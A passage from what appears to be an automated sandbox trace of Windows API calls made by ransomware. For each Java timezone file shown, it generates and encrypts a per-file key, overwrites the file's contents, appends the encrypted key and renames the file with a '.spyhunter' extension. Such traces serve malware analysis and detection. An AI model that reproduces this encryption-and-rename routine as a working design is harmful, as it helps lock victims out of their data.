hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.886] WriteFile (in: hFile=0x178, lpBuffer=0x25ce564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x25ce564*, lpNumberOfBytesWritten=0x25ce524*=0x4, lpOverlapped=0x0) returned 1 [0167.886] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce524, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce524*=0x30, lpOverlapped=0x0) returned 1 [0167.886] CloseHandle (hObject=0x178) returned 1 [0167.886] GetProcessHeap () returned 0x2c0000 [0167.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.886] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos.spyhunter") returned 67 [0167.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos.spyhunter")) returned 1 [0167.887] GetProcessHeap () returned 0x2c0000 [0167.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.887] GetProcessHeap () returned 0x2c0000 [0167.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.887] GetProcessHeap () returned 0x2c0000 [0167.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2ec0 | out: hHeap=0x2c0000) returned 1 [0167.887] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce560 | out: pbBuffer=0x25ce560) returned 1 [0167.887] GetProcessHeap () returned 0x2c0000 [0167.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce558*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce558*=0x30) returned 1 [0167.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.888] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo") returned 63 [0167.888] StrStrW (lpFirst="Antananarivo", lpSrch=".txt") returned 0x0 [0167.888] GetProcessHeap () returned 0x2c0000 [0167.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.888] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce51c*=0x59, lpOverlapped=0x0) returned 1 [0167.889] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.889] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce51c*=0x59, lpOverlapped=0x0) returned 1 [0167.889] GetProcessHeap () returned 0x2c0000 [0167.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.889] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.889] WriteFile (in: hFile=0x178, lpBuffer=0x25ce55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x25ce55c*, lpNumberOfBytesWritten=0x25ce51c*=0x4, lpOverlapped=0x0) returned 1 [0167.890] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce51c*=0x30, lpOverlapped=0x0) returned 1 [0167.890] CloseHandle (hObject=0x178) returned 1 [0167.890] GetProcessHeap () returned 0x2c0000 [0167.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.890] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo.spyhunter") returned 73 [0167.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo.spyhunter")) returned 1 [0167.891] GetProcessHeap () returned 0x2c0000 [0167.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.891] GetProcessHeap () returned 0x2c0000 [0167.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.891] GetProcessHeap () returned 0x2c0000 [0167.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc438 | out: hHeap=0x2c0000) returned 1 [0167.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce560 | out: pbBuffer=0x25ce560) returned 1 [0167.891] GetProcessHeap () returned 0x2c0000 [0167.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce558*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce558*=0x30) returned 1 [0167.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.896] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius") returned 58 [0167.896] StrStrW (lpFirst="Vilnius", lpSrch=".txt") returned 0x0 [0167.896] GetProcessHeap () returned 0x2c0000 [0167.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.896] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce51c*=0x424, lpOverlapped=0x0) returned 1 [0167.929] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbdc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.933] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x424, lpNumberOfBytesWritten=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce51c*=0x424, lpOverlapped=0x0) returned 1 [0167.933] GetProcessHeap () returned 0x2c0000 [0167.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.934] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.934] WriteFile (in: hFile=0x178, lpBuffer=0x25ce55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x25ce55c*, lpNumberOfBytesWritten=0x25ce51c*=0x4, lpOverlapped=0x0) returned 1 [0167.934] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce51c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce51c*=0x30, lpOverlapped=0x0) returned 1 [0167.934] CloseHandle (hObject=0x178) returned 1 [0167.934] GetProcessHeap () returned 0x2c0000 [0167.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.934] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius.spyhunter") returned 68 [0167.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius.spyhunter")) returned 1 [0167.957] GetProcessHeap () returned 0x2c0000 [0167.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.957] GetProcessHeap () returned 0x2c0000 [0167.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.957] GetProcessHeap () returned 0x2c0000 [0167.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2d40 | out: hHeap=0x2c0000) returned 1 [0167.957] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce558 | out: pbBuffer=0x25ce558) returned 1 [0167.957] GetProcessHeap () returned 0x2c0000 [0167.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.957] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce550*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce550*=0x30) returned 1 [0167.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0168.001] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm") returned 60 [0168.001] StrStrW (lpFirst="Stockholm", lpSrch=".txt") returned 0x0 [0168.001] GetProcessHeap () returned 0x2c0000 [0168.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.001] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce514*=0x410, lpOverlapped=0x0) returned 1 [0168.106] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.106] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce514*=0x410, lpOverlapped=0x0) returned 1 [0168.106] GetProcessHeap () returned 0x2c0000 [0168.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.107] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.107] WriteFile (in: hFile=0x178, lpBuffer=0x25ce554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x25ce554*, lpNumberOfBytesWritten=0x25ce514*=0x4, lpOverlapped=0x0) returned 1 [0168.107] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce514*=0x30, lpOverlapped=0x0) returned 1 [0168.107] CloseHandle (hObject=0x178) returned 1 [0168.128] GetProcessHeap () returned 0x2c0000 [0168.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.128] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm.spyhunter") returned 70 [0168.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm.spyhunter")) returned 1 [0168.299] GetProcessHeap () returned 0x2c0000 [0168.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.299] GetProcessHeap () returned 0x2c0000 [0168.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.299] GetProcessHeap () returned 0x2c0000 [0168.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc2a8 | out: hHeap=0x2c0000) returned 1 [0168.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce558 | out: pbBuffer=0x25ce558) returned 1 [0168.299] GetProcessHeap () returned 0x2c0000 [0168.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce550*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce550*=0x30) returned 1 [0168.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0168.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London") returned 57 [0168.300] StrStrW (lpFirst="London", lpSrch=".txt") returned 0x0 [0168.300] GetProcessHeap () returned 0x2c0000 [0168.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.300] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce514*=0x7e8, lpOverlapped=0x0) returned 1 [0168.348] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff818, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.348] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x7e8, lpNumberOfBytesWritten=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce514*=0x7e8, lpOverlapped=0x0) returned 1 [0168.348] GetProcessHeap () returned 0x2c0000 [0168.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.348] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.348] WriteFile (in: hFile=0x178, lpBuffer=0x25ce554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x25ce554*, lpNumberOfBytesWritten=0x25ce514*=0x4, lpOverlapped=0x0) returned 1 [0168.348] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce514, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce514*=0x30, lpOverlapped=0x0) returned 1 [0168.348] CloseHandle (hObject=0x178) returned 1 [0168.348] GetProcessHeap () returned 0x2c0000 [0168.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.349] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London.spyhunter") returned 67 [0168.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london.spyhunter")) returned 1 [0168.350] GetProcessHeap () returned 0x2c0000 [0168.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.350] GetProcessHeap () returned 0x2c0000 [0168.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.350] GetProcessHeap () returned 0x2c0000 [0168.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe3c0 | out: hHeap=0x2c0000) returned 1 [0168.350] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce550 | out: pbBuffer=0x25ce550) returned 1 [0168.350] GetProcessHeap () returned 0x2c0000 [0168.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.351] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce548*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce548*=0x30) returned 1 [0168.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0168.351] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev") returned 55 [0168.351] StrStrW (lpFirst="Kiev", lpSrch=".txt") returned 0x0 [0168.352] GetProcessHeap () returned 0x2c0000 [0168.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.352] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce50c*=0x418, lpOverlapped=0x0) returned 1 [0168.726] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.726] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x418, lpNumberOfBytesWritten=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce50c*=0x418, lpOverlapped=0x0) returned 1 [0168.726] GetProcessHeap () returned 0x2c0000 [0168.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.726] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.726] WriteFile (in: hFile=0x178, lpBuffer=0x25ce54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x25ce54c*, lpNumberOfBytesWritten=0x25ce50c*=0x4, lpOverlapped=0x0) returned 1 [0168.726] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce50c*=0x30, lpOverlapped=0x0) returned 1 [0168.726] CloseHandle (hObject=0x178) returned 1 [0168.727] GetProcessHeap () returned 0x2c0000 [0168.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.727] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev.spyhunter") returned 65 [0168.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev.spyhunter")) returned 1 [0168.727] GetProcessHeap () returned 0x2c0000 [0168.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.727] GetProcessHeap () returned 0x2c0000 [0168.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.727] GetProcessHeap () returned 0x2c0000 [0168.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0678 | out: hHeap=0x2c0000) returned 1 [0168.728] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce550 | out: pbBuffer=0x25ce550) returned 1 [0168.728] GetProcessHeap () returned 0x2c0000 [0168.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.728] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce548*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce548*=0x30) returned 1 [0168.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0168.728] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam") returned 60 [0168.728] StrStrW (lpFirst="Amsterdam", lpSrch=".txt") returned 0x0 [0168.728] GetProcessHeap () returned 0x2c0000 [0168.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.728] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce50c*=0x608, lpOverlapped=0x0) returned 1 [0168.784] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff9f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.784] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x608, lpNumberOfBytesWritten=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce50c*=0x608, lpOverlapped=0x0) returned 1 [0168.784] GetProcessHeap () returned 0x2c0000 [0168.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.784] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.784] WriteFile (in: hFile=0x178, lpBuffer=0x25ce54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x25ce54c*, lpNumberOfBytesWritten=0x25ce50c*=0x4, lpOverlapped=0x0) returned 1 [0168.785] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce50c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce50c*=0x30, lpOverlapped=0x0) returned 1 [0168.785] CloseHandle (hObject=0x178) returned 1 [0168.785] GetProcessHeap () returned 0x2c0000 [0168.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.785] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam.spyhunter") returned 70 [0168.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam.spyhunter")) returned 1 [0168.786] GetProcessHeap () returned 0x2c0000 [0168.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.786] GetProcessHeap () returned 0x2c0000 [0168.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.786] GetProcessHeap () returned 0x2c0000 [0168.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebbd30 | out: hHeap=0x2c0000) returned 1 [0168.786] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce548 | out: 